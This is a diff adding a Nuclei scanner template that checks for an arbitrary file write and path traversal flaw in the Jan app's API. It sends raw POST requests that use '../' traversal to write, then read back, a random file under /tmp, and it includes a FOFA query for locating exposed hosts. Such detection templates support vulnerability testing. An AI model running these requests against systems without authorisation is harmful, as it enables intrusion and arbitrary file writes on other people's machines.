Create jan-api-lfi.yaml

http/vulnerabilities/other/jan-api-lfi.yaml

@@ -0,0 +1,50 @@
+id: jan-api-lfi
+
+info:
+  name: Jan's API interface writeFileSync & appendFileSync - Arbitrary File Upload
+  author: pussycat0x
+  severity: high
+  description: |
+    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
+  reference:
+    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
+  metadata:
+    fofa-query: icon_hash="-165268926"
+    max-request: 2
+  tags: jan,lfi
+variables:
+
+http:
+  - raw:
+      - |
+        POST /v1/app/appendFileSync HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+        Accept-Encoding: gzip, deflate, br
+        Referer: {{RootURL}}
+        contentType: application/json
+        Origin: {{RootURL}}
+
+        ["/../../../../../tmp/{{randstr}}.txt","{{randstr}}"]
+      - |
+        POST /v1/app/readFileSync HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate, br
+        Referer: {{RootURL}}
+        contentType: application/json
+        Content-Type: text/plain;charset=UTF-8
+        Origin: {{RootURL}}
+
+        ["file:/../../../../../tmp/{{randstr}}.txt","utf-8"]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '{{randstr}}'
+
+      - type: status
+        status:
+          - 200